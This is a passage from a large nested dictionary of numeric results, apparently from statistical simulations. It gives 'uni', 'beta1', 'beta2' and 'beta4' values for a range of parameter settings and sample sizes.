2.1502607486814758, 'beta1': 2.961193440812989, 'beta2': 3.6605411238614165, 'beta4': [0.1685138308258897, 4.444830757691141]}, 750: {'uni': 2.048526112731403, 'beta1': 4.151762896697908, 'beta2': 2.3424163082460217, 'beta4': [0.17031697375504729, 6.406286404246016]}, 500: {'uni': 2.495870260411924, 'beta1': 3.011726545286237, 'beta2': 3.2570697722296176, 'beta4': [0.1655469571590933, 5.777875203382532]}, 400: {'uni': 2.099881963929635, 'beta1': 2.329850145831139, 'beta2': 2.5795427219498634, 'beta4': [0.1891660716402167, 4.113063534228842]}, 300: {'uni': 2.789000548267903, 'beta1': 3.3427408254436237, 'beta2': 2.838444995116569, 'beta4': [0.18080810485975166, 5.743157914926659]}, 200: {'uni': 2.714319577071239, 'beta1': 2.674969297747632, 'beta2': 4.072106365271376, 'beta4': [0.1673096893670284, 4.156795438643065]}, 150: {'uni': 2.0149494775741075, 'beta1': 2.077635206644789, 'beta2': 3.078141288269228, 'beta4': [0.18767729882393866, 4.360721452118907]}, 100: {'uni': 1.9624533144767615, 'beta1': 3.019315635257828, 'beta2': 4.385469655540163, 'beta4': [0.1900315552805855, 3.3758081408933553]}, 75: {'uni': 2.6676512104969414, 'beta1': 5.305550512983561, 'beta2': 3.1206067511159787, 'beta4': [0.18286929913842218, 4.0556761458530515]}, 50: {'uni': 1.7764267325813035, 'beta1': 3.9516861090331017, 'beta2': 2.409413746837362, 'beta4': [0.17075107365496775, 3.4929925209103336]}, 30: {'uni': 1.979122970210084, 'beta1': 2.7491634214533307, 'beta2': 4.072617355039488, 'beta4': [0.2180077625841771, 3.2609298387610655]}, 20: {'uni': 1.8375355117463443, 'beta1': 2.3463533042171085, 'beta2': 2.503163105574244, 'beta4': [0.21114898088540743, 2.787162687085637]}, 10: {'uni': 2.427976117487353, 'beta1': 2.291521208099949, 'beta2': 2.944087053867329, 'beta4': [0.17835194176860436, 2.5696040508544296]}}}, 0.2: {1000: {1000: {'uni': 0.012280780292956572, 'beta1': 0.0002693384381689057, 'beta2': 0.2090690518552283, 'beta4': [0.0018020663792893063, 1.0502132198035559]}, 750: {'uni': 
0.01651843115887509, 'beta1': 0.0005487421176163686, 'beta2': 0.20148442431487518, 'beta4': [0.0024425787732128127, 1.0477212885148937]}, 500: {'uni': 0.025353088253298767, 'beta1': 0.0010396605293617447, 'beta2': 0.23966111809097265, 'beta4': [0.0034985508949701427, 1.038970161345098]}, 400: {'uni': 0.030198518441976466, 'beta1': 0.0012021829507310755, 'beta2': 0.2594658028963883, 'beta4': [0.004490616440973693, 1.0371676882826277]}, 300: {'uni': 0.04730794946255178, 'beta1': 0.0031329041561488774, 'beta2': 0.28118782311034385, 'beta4': [0.006281029145284682, 1.0325050480220268]}, 200: {'uni': 0.05761447368464398, 'beta1': 0.00673361604946926, 'beta2': 0.2975256995575922, 'beta4': [0.009157081044446456, 1.0260278761104196]}, 150: {'uni': 0.07591819198214711, 'beta1': 0.013946942490422313, 'beta2': 0.34576552304435454, 'beta4': [0.011552729481228095, 1.0240945498285348]}, 100: {'uni': 0.1368580302706355, 'beta1': 0.02526249569893405, 'beta2': 0.38557800822543326, 'beta4': [0.019884020172808305, 1.0191300056011763]}, 75: {'uni': 0.1287872905890261, 'beta1': 0.030867395988007203, 'beta2': 0.4469931272901678, 'beta4': [0.02345546040016165, 1.0175172104748686]}, 50: {'uni': 0.1886157640394165, 'beta1': 0.06213874888664438, 'beta2': 0.4968675395552036, 'beta4': [0.031118814289369752, 1.015031367073955]}, 30: {'uni': 0.3360712300993455, 'beta1': 0.14289602608957086, 'beta2': 0.5929558125978679, 'beta4': [0.05283026319228742, 1.0118317036567743]}, 20: {'uni': 0.37439596985315937, 'beta1': 0.19104466956177601, 'beta2': 0.6679428647952825, 'beta4': [0.058414984981661984, 1.0110032494290406]}, 10: {'uni': 0.5889445132413289, 'beta1': 0.41592284653448874, 'beta2': 0.7578871781713459, 'beta4': [0.09012671207857803, 1.0074859980250308]}}, 750: {1000: {'uni': 0.0146304743338266, 'beta1': 0.0005353139672967838, 'beta2': 0.21543389133258695, 'beta4': [0.002897910486266618, 1.068844018212424]}, 750: {'uni': 0.016626630038685863, 'beta1': 0.000506508364560486, 'beta2': 
0.2414624038752328, 'beta4': [0.00262856495812392, 1.0640476852072571]}, 500: {'uni': 0.022089331148686053, 'beta1': 0.0009422277350338522, 'beta2': 0.2479237578547018, 'beta4': [0.003432339519279511, 1.0569707861052167]}, 400: {'uni': 0.030814483057757476, 'beta1': 0.0022416542674890327, 'beta2': 0.24616751839453985, 'beta4': [0.004434707962325523, 1.0509906076614757]}, 300: {'uni': 0.03912077527542531, 'beta1': 0.002888923108919827, 'beta2': 0.2618563052834662, 'beta4': [0.005607512772963669, 1.0431435805548956]}, 200: {'uni': 0.0589807671507729, 'beta1': 0.0064499974624839486, 'beta2': 0.3105643336337045, 'beta4': [0.011864309357212723, 1.0353157317081894]}, 150: {'uni': 0.07154171520476793, 'beta1': 0.009202361892378634, 'beta2': 0.3433516617468062, 'beta4': [0.012041150326569453, 1.030658596755859]}, 100: {'uni': 0.11355909804218103, 'beta1': 0.016742564920940374, 'beta2': 0.4408459910322566, 'beta4': [0.01589543424873943, 1.0259719809454315]}, 75: {'uni': 0.1470273339563956, 'beta1': 0.04125038029241875, 'beta2': 0.45674725702545044, 'beta4': [0.022555544574912895, 1.0233327169256352]}, 50: {'uni': 0.20394668402714952, 'beta1': 0.05372064930491053, 'beta2': 0.5123425216124959, 'beta4': [0.0304452000024452, 1.0200138365664115]}, 30: {'uni': 0.29386982148971175, 'beta1': 0.11208120239277584, 'beta2': 0.566212490043836, 'beta4': [0.05037312077653552, 1.0162468129423625]}, 20: {'uni': 0.4163288316571464, 'beta1': 0.1957238486090897, 'beta2': 0.6485082504821236, 'beta4': [0.06315650633950089, 1.0124363037896646]}, 10: {'uni': 0.5941397773736758, 'beta1': 0.4652476209261588, 'beta2': 0.7793225324115746, 'beta4': [0.09474615964960159, 1.0118194733649668]}}, 500: {1000: {'uni': 0.02108754785696739, 'beta1': 0.000828450449946846, 'beta2': 0.23804932124856504, 'beta4': [0.003958299034384424, 1.0966419370784732]}, 750: {'uni': 0.0231126438648383, 'beta1': 0.0011984870212622199, 'beta2': 0.24394501858530787, 'beta4': [0.003959031038270082, 1.091515598515446]}, 500: 
{'uni': 0.022275983484612037, 'beta1': 0.0013732758438846776, 'beta2': 0.2388404713964999, 'beta4': [0.003877722834733257, 1.0768224445920325]}, 400: {'uni': 0.02715548978278476, 'beta1': 0.0014775685950695514, 'beta2': 0.2484098395121755, 'beta4': [0.004386814061610222, 1.0687088791174149]}, 300: {'uni': 0.04498460516730482, 'beta1': 0.003852979657961273, 'beta2': 0.28089547945046694, 'beta4': [0.006194097426606414, 1.0599273761126238]}, 200: {'uni': 0.060660963828962605, 'beta1': 0.005071898129623075, 'beta2': 0.3407020595992429, 'beta4': [0.008591729401854804, 1.0615248105680746]}, 150: {'uni': 0.08186611317553552, 'beta1': 0.009229562012829961, 'beta2': 0.3249653471688221, 'beta4': [0.011742812742923414, 1.0477046573914812]}, 100: {'uni': 0.14183665282462907, 'beta1': 0.02592201655783873, 'beta2': 0.4317014020935504, 'beta4': [0.017506491846792815, 1.0396479032970523]}, 75: {'uni': 0.13469268827271816, 'beta1': 0.03072455411464323, 'beta2': 0.40854305278610353, 'beta4': [0.023802069158570326, 1.0345503480689766]}, 50: {'uni': 0.2267326479955361, 'beta1': 0.06283204007090228, 'beta2': 0.47352253571629066, 'beta4': [0.03299971248019334, 1.0307427172444934]}, 30: {'uni': 0.30926013693933796, 'beta1': 0.12802403468984566, 'beta2': 0.5919033598519557, 'beta4': [0.0446428946566547, 1.024235192981656]}, 20: {'uni': 0.36495683958552094, 'beta1': 0.21502934587386965, 'beta2': 0.655814111969914, 'beta4': [0.0668219237466946, 1.0209794959351524]}, 10: {'uni': 0.5993358090672234, 'beta1': 0.41112679093508553, 'beta2': 0.7547878772085324, 'beta4': [0.09227814617364233, 1.0145010250500368]}}, 400: {1000: {'uni': 0.025896757785848847, 'beta1': 0.002275505689533187, 'beta2': 0.26906265954395275, 'beta4': [0.005316252950804182, 1.1053525286504498]}, 750: {'uni': 0.030999475873056417, 'beta1': 0.0013746739567481712, 'beta2': 0.24465392626230614, 'beta4': [0.005176818412544991, 1.1019675368471202]}, 500: {'uni': 0.025622811417340657, 'beta1': 0.0019022171807471847, 'beta2': 
0.24729224167591998, 'beta4': [0.005578228859751129, 1.1013403509292035]}, 400: {'uni': 0.029561442343993004, 'beta1': 0.002048023106808748, 'beta2': 0.27637565566664013, 'beta4': [0.004998616282624286, 1.0859532939934569]}, 300: {'uni': 0.03571761814634283, 'beta1': 0.002437177583227123, 'beta2': 0.2700165589811169, 'beta4': [0.007821456553393443, 1.0785300663455835]}, 200: {'uni': 0.05477353463547685, 'beta1': 0.007157574589887143, 'beta2': 0.36000438163781423, 'beta4': [0.009477632290181273, 1.0679008578747287]}, 150: {'uni': 0.07637914396289984, 'beta1': 0.008214072491315897, 'beta2': 0.3313508914969982, 'beta4': [0.010896098343519681, 1.0606215920525077]}, 100: {'uni': 0.11381210686532531, 'beta1': 0.018398479440258932, 'beta2': 0.3848114060260855, 'beta4': [0.01842792204189153, 1.0494021227638108]}, 75: {'uni': 0.13235635536736093, 'beta1': 0.0400207536216299, 'beta2': 0.43622251050409433, 'beta4': [0.02096042420956011, 1.0417337524508474]}, 50: {'uni': 0.20784298399859202, 'beta1': 0.07130540772043548, 'beta2': 0.5172134773734999, 'beta4': [0.031019984250849474, 1.0399235220946341]}, 30: {'uni': 0.2806740167803171, 'beta1': 0.11704543446506291, 'beta2': 0.5702527726239361, 'beta4': [0.04554425947712502, 1.0308498609198327]}, 20: {'uni': 0.40246892267081, 'beta1': 0.20410446629412546, 'beta2': 0.6441518759507474, 'beta4': [0.05556042308335842, 1.0232480248410107]}, 10: {'uni': 0.598029613692239, 'beta1': 0.3829637206480797, 'beta2': 0.764251193581595, 'beta4': [0.09040730486062148, 1.019159751691838]}}, 300: {1000: {'uni': 0.03927216885312887, 'beta1': 0.0028801095098431964, 'beta2': 0.24947150687424588, 'beta4': [0.006471187793034744, 1.160842602904632]}, 750: {'uni': 0.04444164944164811, 'beta1': 0.002888622051822249, 'beta2': 0.2592722580304042, 'beta4': [0.006201130494927228, 1.1590062388205389]}, 500: {'uni': 0.03386451243834725, 'beta1': 0.0038221572392608933, 'beta2': 0.27658117256322334, 'beta4': [0.006739074173776894, 1.1233561596091521]}, 400: 
{'uni': 0.04800908765953219, 'beta1': 0.003065738369982432, 'beta2': 0.28548162501904323, 'beta4': [0.00606252876571075, 1.108126781417158]}, 300: {'uni': 0.05760353656127645, 'beta1': 0.003795886776418645, 'beta2': 0.2863528848787791, 'beta4': [0.006410206857481998, 1.1008081595374801]}, 200: {'uni': 0.05530565353026629, 'beta1': 0.007022220375979206, 'beta2': 0.3218109561131835, 'beta4': [0.008012846276247196, 1.0851800676090981]}, 150: {'uni': 0.1015884659040974, 'beta1': 0.010932465278433428, 'beta2': 0.346711515967189, 'beta4': [0.01438935035588938, 1.0772279067151915]}, 100: {'uni': 0.10066039964522674, 'beta1': 0.019599157825161983, 'beta2': 0.3976221533440906, 'beta4': [0.016667365195821262, 1.0619499723924766]}, 75: {'uni': 0.13815160891461617, 'beta1': 0.03502822760481833, 'beta2': 0.4383232053771871, 'beta4': [0.020620270083654274, 1.0613801533703469]}, 50: {'uni': 0.2066489219754158, 'beta1': 0.06567958756880526, 'beta2': 0.4952136429816835, 'beta4': [0.030838115238396878, 1.0494382597763074]}, 30: {'uni': 0.3439260948693291, 'beta1': 0.1260781571060967, 'beta2': 0.5639845179676323, 'beta4': [0.043988630038169885, 1.0379761722153382]}, 20: {'uni': 0.373632536240914, 'beta1': 0.198641104511171, 'beta2': 0.6452030053501869, 'beta4': [0.05742329072620164, 1.0343631164659426]}, 10: {'uni': 0.5786272688848213, 'beta1': 0.38699506401815836, 'beta2': 0.7654074587403914, 'beta4': [0.09447939575707047, 1.0225736679875932]}}, 200: {1000: {'uni': 0.06593180893978717, 'beta1': 0.004952441169426624, 'beta2': 0.32211181174186826, 'beta4': [0.009731394920594555, 1.2036434242302154]}, 750: {'uni': 0.050050536074611546, 'beta1': 0.006136627342269299, 'beta2': 0.41164072649474215, 'beta4': [0.008362211620772572, 1.2102293050053385]}, 500: {'uni': 0.05148222892421142, 'beta1': 0.0044901273914807575, 'beta2': 0.3278867264985391, 'beta4': [0.010669013908256336, 1.19341818888688]}, 400: {'uni': 0.05311457852860502, 'beta1': 0.006855300638757073, 'beta2': 0.3051136005232666, 
'beta4': [0.008864068572306396, 1.1940907811101498]}, 300: {'uni': 0.058569513810713326, 'beta1': 0.006359938814453158, 'beta2': 0.3510907562210193, 'beta4': [0.01035722486111736, 1.1576432677671158]}, 200: {'uni': 0.07231911900208032, 'beta1': 0.009541107607029078, 'beta2': 0.3406432710228655, 'beta4': [0.009895950553842075, 1.134981886136477]}, 150: {'uni': 0.06879337077817359, 'beta1': 0.00908941619076127, 'beta2': 0.3562401517641972, 'beta4': [0.012642116783133737, 1.126631367592092]}, 100: {'uni': 0.09847445660132435, 'beta1': 0.023351167906981215, 'beta2': 0.3702057371167343, 'beta4': [0.020174892176101, 1.1035884364086865]}, 75: {'uni': 0.13842215822110243, 'beta1': 0.040074923811621865, 'beta2': 0.4016290449749483, 'beta4': [0.025368667272077594, 1.0816686828715776]}, 50: {'uni': 0.2319732833555621, 'beta1': 0.058682815020592964, 'beta2': 0.449773155245931, 'beta4': [0.02730342261673676, 1.072599635960804]}, 30: {'uni': 0.3101271727138763, 'beta1': 0.12657777631872538, 'beta2': 0.5474897963622241, 'beta4': [0.051145369772815974, 1.0623736422151917]}, 20: {'uni': 0.3961402044589855, 'beta1': 0.19850885747842734, 'beta2': 0.6186209195012662, 'beta4': [0.05940991818827158, 1.0513644617190916]}, 10: {'uni': 0.5757986824828967, 'beta1': 0.40423129685515935, 'beta2': 0.7505415142571369, 'beta4': [0.09379731922689409, 1.039165679271243]}}, 150: {1000: {'uni': 0.06409389658307825, 'beta1': 0.009910476131101938, 'beta2': 0.3806517369874718, 'beta4': [0.017842367687703767, 1.273216215005103]}, 750: {'uni': 0.07885955543671457, 'beta1': 0.013763072632693718, 'beta2': 0.3644659021625199, 'beta4': [0.011918256361555676, 1.2636715858729746]}, 500: {'uni': 0.0782362103749921, 'beta1': 0.011063387421172906, 'beta2': 0.3492767192933155, 'beta4': [0.015527147770540454, 1.2388524034789448]}, 400: {'uni': 0.08206814173951552, 'beta1': 0.0105477079679912, 'beta2': 0.36894084845731795, 'beta4': [0.014908702122614857, 1.212354152577374]}, 300: {'uni': 0.07712147055703845, 
'beta1': 0.013570500873764199, 'beta2': 0.3886339629626576, 'beta4': [0.01257341645320956, 1.1948059873364203]}, 200: {'uni': 0.07403838281349277, 'beta1': 0.014174956292383793, 'beta2': 0.3950286524652677, 'beta4': [0.011937421306978668, 1.1777024261360427]}, 150: {'uni': 0.08411412518651155, 'beta1': 0.012028423896870248, 'beta2': 0.3818541442194885, 'beta4': [0.01208166846307851, 1.1514427861414884]}, 100: {'uni': 0.10466099788702969, 'beta1': 0.021407915808379432, 'beta2': 0.536739509831108, 'beta4': [0.016639317502525126, 1.1213359880442546]}, 75: {'uni': 0.1639590772562653, 'beta1': 0.029456618460635874, 'beta2': 0.4241204047591904, 'beta4': [0.020685089221907236, 1.1220699258280653]}, 50: {'uni': 0.21195935570350966, 'beta1': 0.050872484133304474, 'beta2': 0.48434321428634336, 'beta4': [0.03329067097448155, 1.1042086282877204]}, 30: {'uni': 0.30021647417605113, 'beta1': 0.1596029309488946, 'beta2': 0.5716372430031915, 'beta4': [0.0499410592964029, 1.0773251535218258]}, 20: {'uni': 0.3949077922550226, 'beta1': 0.2117560147178309, 'beta2': 0.6654963464294259, 'beta4': [0.06269582775240698, 1.0662881676425546]}, 10: {'uni': 0.5789591056497254, 'beta1': 0.42152167320469863, 'beta2': 0.7554936621338648, 'beta4': [0.09424799097838252, 1.0533803023202404]}}, 100: {1000: {'uni': 0.1194156470953036, 'beta1': 0.01975867033885883, 'beta2': 0.38041630466120363, 'beta4': [0.024152237250705463, 1.4090426779720273]}, 750: {'uni': 0.1339598298370513, 'beta1': 0.02312816824466994, 'beta2': 0.36885145013242054, 'beta4': [0.01982726902974318, 1.3708518857235923]}, 500: {'uni': 0.1035033245625255, 'beta1': 0.020732864110625814, 'beta2': 0.45503343746867975, 'beta4': [0.018104556463916902, 1.3457075667383138]}, 400: {'uni': 0.13886200283191671, 'beta1': 0.033658545561272284, 'beta2': 0.4492892269062327, 'beta4': [0.018812997051150655, 1.3133090999063297]}, 300: {'uni': 0.1081039869660674, 'beta1': 0.025748028713259506, 'beta2': 0.4804479970623521, 'beta4': [0.019440969752786388, 
1.3645100349536026]}, 200: {'uni': 0.10834338931329811, 'beta1': 0.025134994582497336, 'beta2': 0.44719795518594385, 'beta4': [0.01985586858794121, 1.271297008277481]}, 150: {'uni': 0.10712222517002118, 'beta1': 0.022613877946775662, 'beta2': 0.47758394504359103, 'beta4': [0.019572061091874843, 1.2574112506220025]}, 100: {'uni': 0.1668102455464986, 'beta1': 0.028918170904344648, 'beta2': 0.5875385470461234, 'beta4': [0.01921321761305392, 1.2005469273434903]}, 75: {'uni': 0.14135594283467587, 'beta1': 0.0414053687092711, 'beta2': 0.447284407621719, 'beta4': [0.02519589264892086, 1.1702958014284723]}, 50: {'uni': 0.17825851499059536, 'beta1': 0.0602645575613488, 'beta2': 0.5425738075050448, 'beta4': [0.0318471605346179, 1.1527026666904288]}, 30: {'uni': 0.31553458317183447, 'beta1': 0.11288833543480611, 'beta2': 0.5420894350287434, 'beta4': [0.04618637746422554, 1.1126856866808228]}, 20: {'uni': 0.40279034362262994, 'beta1': 0.2014111707304979, 'beta2': 0.5994182473676781, 'beta4': [0.06368202517740608, 1.1083190253440836]}, 10: {'uni': 0.5758568363154362, 'beta1': 0.37794937111554805, 'beta2': 0.7414226913600013, 'beta4': [0.10749142038604542, 1.078648425767379]}}, 75: {1000: {'uni': 0.15198660481824744, 'beta1': 0.036008431318779996, 'beta2': 0.4722224787708969, 'beta4': [0.027516412068499897, 1.534216828529965]}, 750: {'uni': 0.17208264399948853, 'beta1': 0.03909264011281362, 'beta2': 0.6400645338590032, 'beta4': [0.02340077871735158, 1.4753355323679431]}, 500: {'uni': 0.1680012490284888, 'beta1': 0.05632032512882802, 'beta2': 0.5903766149915854, 'beta4': [0.020364313693572396, 1.4541567750184143]}, 400: {'uni': 0.143726941597115, 'beta1': 0.05071904581785537, 'beta2': 0.4303060292771255, 'beta4': [0.03295149694207187, 1.399313576809266]}, 300: {'uni': 0.18177622688584122, 'beta1': 0.047176957786292203, 'beta2': 0.5493492545653206, 'beta4': [0.022838896555165238, 1.3583642788350967]}, 200: {'uni': 0.15601957161470076, 'beta1': 0.036011709792265006, 'beta2': 
0.5731923214795615, 'beta4': [0.025949998185882228, 1.378321286217048]}, 150: {'uni': 0.13257484917386256, 'beta1': 0.04822774386024882, 'beta2': 0.5831931502945309, 'beta4': [0.032781898025316815, 1.3687382603624914]}, 100: {'uni': 0.17722038629436307, 'beta1': 0.042694795909128086, 'beta2': 0.6029512404969393, 'beta4': [0.029877309146450395, 1.2681586706189192]}, 75: {'uni': 0.15891757845874932, 'beta1': 0.05355874965931141, 'beta2': 0.5300785911451448, 'beta4': [0.024918571880254658, 1.249215328218056]}, 50: {'uni': 0.18061682437151294, 'beta1': 0.05778453530955624, 'beta2': 0.5259465500991863, 'beta4': [0.02589140629920943, 1.1870268806723268]}, 30: {'uni': 0.2932284826916738, 'beta1': 0.12331237733161636, 'beta2': 0.5673856570268109, 'beta4': [0.044505647902749156, 1.155359943383599]}, 20: {'uni': 0.4521356971815503, 'beta1': 0.18953667103215918, 'beta2': 0.610039387320265, 'beta4': [0.0582975169999248, 1.1287493981989316]}, 10: {'uni': 0.5902047893457638, 'beta1': 0.399006287470108, 'beta2': 0.7279029685166025, 'beta4': [0.09005082946454858, 1.1274449949615486]}}, 50: {1000: {'uni': 0.2592076419350719, 'beta1': 0.08467191522733127, 'beta2': 0.734314769066797, 'beta4': [0.04213219735340979, 1.7222471762357856]}, 750: {'uni': 0.22167472117269596, 'beta1': 0.09540608751728515, 'beta2': 0.6421055730602457, 'beta4': [0.0504857786224193, 1.7019362614923808]}, 500: {'uni': 0.24531208210966063, 'beta1': 0.10627289268903653, 'beta2': 0.6456700227453712, 'beta4': [0.037069614011306415, 1.5187817437439013]}, 400: {'uni': 0.23695230367792885, 'beta1': 0.1002348842240865, 'beta2': 0.6049088807842221, 'beta4': [0.037868788524990434, 1.7812259821193235]}, 300: {'uni': 0.23115353035249844, 'beta1': 0.09531354298937929, 'beta2': 0.6911305993958063, 'beta4': [0.04299005884233124, 1.6010012435025673]}, 200: {'uni': 0.281525317673935, 'beta1': 0.09540124922896594, 'beta2': 0.6097339897307856, 'beta4': [0.037532176774296495, 1.6532632152046558]}, 150: {'uni': 0.22683249774663827, 
'beta1': 0.08442270699935141, 'beta2': 0.7320138430968691, 'beta4': [0.03990371983864124, 1.4661997548716317]}, 100: {'uni': 0.2430263267539406, 'beta1': 0.10006392357305124, 'beta2': 0.7821900964967258, 'beta4': [0.03933639350774809, 1.391655290350789]}, 75: {'uni': 0.276189771579198, 'beta1': 0.0887640194455103, 'beta2': 0.6129637162484526, 'beta4': [0.03756894113400522, 1.390111322107257]}, 50: {'uni': 0.29778921217600474, 'beta1': 0.08612400831717622, 'beta2': 0.666981830661031, 'beta4': [0.031164853582807427, 1.3358991647553666]}, 30: {'uni': 0.2724782219999575, 'beta1': 0.13307131181798842, 'beta2': 0.6442109151591487, 'beta4': [0.04036794068199744, 1.2563196523679523]}, 20: {'uni': 0.41797425695598467, 'beta1': 0.1882874604106344, 'beta2': 0.7691372650156472, 'beta4': [0.059432531917173244, 1.2208571964471882]}, 10: {'uni': 0.5534689290667542, 'beta1': 0.4309100389659457, 'beta2': 0.7401015027587745, 'beta4': [0.09902687359586748, 1.1629411926124198]}}, 30: {1000: {'uni': 0.42071315434786194, 'beta1': 0.3029377220718273, 'beta2': 0.812141471651635, 'beta4': [0.06650330678120728, 2.020979343996272]}, 750: {'uni': 0.4519278080535244, 'beta1': 0.23297010287113198, 'beta2': 1.2570282718489256, 'beta4': [0.08856354984151762, 1.900675005693711]}, 500: {'uni': 0.490379074291211, 'beta1': 0.22164571894561366, 'beta2': 1.1513628955563604, 'beta4': [0.06173029516131422, 2.106609476056458]}, 400: {'uni': 0.39408498283423027, 'beta1': 0.264918129333582, 'beta2': 0.8840846910050425, 'beta4': [0.05283404446603562, 2.029681875929849]}, 300: {'uni': 0.5427138663027202, 'beta1': 0.2379881723996197, 'beta2': 0.8363520498569965, 'beta4': [0.06281976632758741, 1.986886804942407]}, 200: {'uni': 0.41057068188367307, 'beta1': 0.21827805543776632, 'beta2': 0.9448279749895979, 'beta4': [0.07380808667104646, 1.82960910894638]}, 150: {'uni': 0.4803138989403234, 'beta1': 0.2391926745124124, 'beta2': 0.7949557568023287, 'beta4': [0.06065292517095262, 1.9106220557945983]}, 100: {'uni': 
0.384454764576367, 'beta1': 0.21463268237662367, 'beta2': 1.0750644448071933, 'beta4': [0.05395328522325796, 1.6868737907037483]}, 75: {'uni': 0.37686548308814144, 'beta1': 0.1803066791969128, 'beta2': 0.8135615889320663, 'beta4': [0.05869896393842299, 1.758756502053507]}, 50: {'uni': 0.43171434803060726, 'beta1': 0.2505599625779312, 'beta2': 1.0757749691129281, 'beta4': [0.05273825248231705, 1.5564961938411799]}, 30: {'uni': 0.51976331390363, 'beta1': 0.2137422259138964, 'beta2': 0.9685059088900959, 'beta4': [0.05537585694294487, 1.492573272428689]}, 20: {'uni': 0.4398832977629888, 'beta1': 0.2038338719891519, 'beta2': 0.9093408387748209, 'beta4': [0.06105880798359843, 1.4158958005586584]}, 10: {'uni': 0.602699561740835, 'beta1': 0.4091942418408925, 'beta2': 1.0985411109097716, 'beta4': [0.09013494857283567, 1.2751619916727241]}}, 20: {1000: {'uni': 0.8863415930595386, 'beta1': 0.4124138906473128, 'beta2': 1.488915214895412, 'beta4': [0.09369684930943876, 2.5300474929166104]}, 750: {'uni': 0.6761163081220196, 'beta1': 0.6112111176414844, 'beta2': 1.1574051144435042, 'beta4': [0.09350064236361985, 2.4233068456250466]}, 500: {'uni': 0.7326156383642906, 'beta1': 0.45488960268311474, 'beta2': 1.0667140010754592, 'beta4': [0.08539132003116143, 2.392318747646077]}, 400: {'uni': 0.9458240653327108, 'beta1': 0.5132179115834019, 'beta2': 1.1170018019059054, 'beta4': [0.09756400190793793, 2.383853429295003]}, 300: {'uni': 0.6953482539627818, 'beta1': 0.37005811426083546, 'beta2': 1.3395766294720786, 'beta4': [0.10236241919596632, 2.2424866381905315]}, 200: {'uni': 0.6752386657747762, 'beta1': 0.5629563163345486, 'beta2': 1.5090274583586125, 'beta4': [0.09418806419964053, 2.137879622888132]}, 150: {'uni': 0.6578393936141584, 'beta1': 0.40103058328304875, 'beta2': 1.486585761364853, 'beta4': [0.09597951072128233, 2.4974862138426848]}, 100: {'uni': 0.9223237716292768, 'beta1': 0.526962313037276, 'beta2': 1.3422875156501894, 'beta4': [0.11187693983427766, 2.390782201823441]}, 
75: {'uni': 0.9378358647715992, 'beta1': 0.7320432373178699, 'beta2': 1.428360070177185, 'beta4': [0.08107123212486303, 1.9900453884534253]}, 50: {'uni': 0.5886779763529189, 'beta1': 0.7434142787005832, 'beta2': 1.490335833898308, 'beta4': [0.0867226219932577, 1.7708768543057836]}, 30: {'uni': 0.7844811065280236, 'beta1': 0.674585828881643, 'beta2': 1.3416765903993606, 'beta4': [0.10083853135007012, 1.8020388082207972]}, 20: {'uni': 0.6068962998473377, 'beta1': 0.5722158961739197, 'beta2': 1.5402314826280434, 'beta4': [0.09978682190916095, 1.6786815060076368]}, 10: {'uni': 0.6137740105070696, 'beta1': 0.6013842817208861, 'beta2': 1.4032123539466417, 'beta4': [0.09596686888019154, 1.4364997057965616]}}, 10: {1000: {'uni': 2.5487977734820326, 'beta1': 3.093835089134801, 'beta2': 2.628311382488589, 'beta4': [0.17203346857254662, 4.565292216563792]}, 750: {'uni': 1.7304439175235797, 'beta1': 3.4056157251335355, 'beta2': 2.880595484342148, 'beta4': [0.166405967714536, 4.699029049816299]}, 500: {'uni': 2.3351084717688373, 'beta1': 4.452247264467255, 'beta2': 2.6188955235283458, 'beta4': [0.20056108653416985, 4.087275033325601]}, 400: {'uni': 2.731195017919183, 'beta1': 2.350880124717626, 'beta2': 2.856370147812412, 'beta4': [0.16295115167167193, 4.24552877727418]}, 300: {'uni': 2.6641281409091975, 'beta1': 2.1576795517926084, 'beta2': 2.5130859559443004, 'beta4': [0.16779978199870219, 3.868571825041176]}, 200: {'uni': 1.5900925503183005, 'beta1': 3.1409755807227073, 'beta2': 2.2138809993371926, 'beta4': [0.1593318444045239, 4.790452032349865]}, 150: {'uni': 1.6286417760707215, 'beta1': 2.75377845626076, 'beta2': 3.67929821312175, 'beta4': [0.17531673356231803, 4.449312838541493]}, 100: {'uni': 1.8811969967887474, 'beta1': 2.9356208183819876, 'beta2': 2.473884077752684, 'beta4': [0.1709344371346987, 3.647827690030222]}, 75: {'uni': 1.8560795641118366, 'beta1': 3.1515350543410756, 'beta2': 3.0880468571889907, 'beta4': [0.15535292216279414, 4.064998701862136]}, 50: {'uni': 
1.8814827053991783, 'beta1': 2.374493146782945, 'beta2': 3.008522859298132, 'beta4': [0.18437354728017072, 3.38720140624215]}, 30: {'uni': 1.48455109714551, 'beta1': 1.9410442694643812, 'beta2': 2.623047438090551, 'beta4': [0.14962804639542013, 2.944732475701521]}, 20: {'uni': 2.2606118912147144, 'beta1': 2.857453424374173, 'beta2': 2.6002878870531627, 'beta4': [0.16364368010741698, 3.0232270039247746]}, 10: {'uni': 2.0419910091282496, 'beta1': 2.278659514136714, 'beta2': 4.444036437620339, 'beta4': [0.1414900750503085, 2.359580377512841]}}}, 0.25: {1000: {1000: {'uni': 0.013195418550431052, 'beta1': 0.00033599202159974306, 'beta2': 0.17875776570990679, 'beta4': [0.001842483224513699, 1.0501146695568533]}, 750: {'uni': 0.016013552511175373, 'beta1': 0.0007448601839703062, 'beta2': 0.1939607247455362, 'beta4': [0.0026832198909584985, 1.045851171150504]}, 500: {'uni': 0.028606084800545467, 'beta1': 0.0009990776069765802, 'beta2': 0.23019643865863643, 'beta4': [0.0039038637470758205, 1.0408378665938753]}, 400: {'uni': 0.026784771828518836, 'beta1': 0.0017503690452189602, 'beta2': 0.23880661743287537, 'beta4': [0.0044638088057132085, 1.0339823686261234]}, 300: {'uni': 0.044901759577933735, 'beta1': 0.003137529397079459, 'beta2': 0.28413102290789566, 'beta4': [0.00570921365480773, 1.0296508775897812]}, 200: {'uni': 0.06082540361236728, 'beta1': 0.0063974879798100875, 'beta2': 0.30606916955325597, 'beta4': [0.008520697454289822, 1.0269966675849775]}, 150: {'uni': 0.07655707515610163, 'beta1': 0.013948369547467494, 'beta2': 0.33861090522030257, 'beta4': [0.011996336066692004, 1.0232867029647827]}, 100: {'uni': 0.10338298270717705, 'beta1': 0.018877705317333838, 'beta2': 0.45060055459442544, 'beta4': [0.022990283509798048, 1.0179700562252552]}, 75: {'uni': 0.1396659034571349, 'beta1': 0.03581049481895991, 'beta2': 0.4434539695729213, 'beta4': [0.020437099800626753, 1.0153667391680519]}, 50: {'uni': 0.19106507905911785, 'beta1': 0.06485537073911667, 'beta2': 
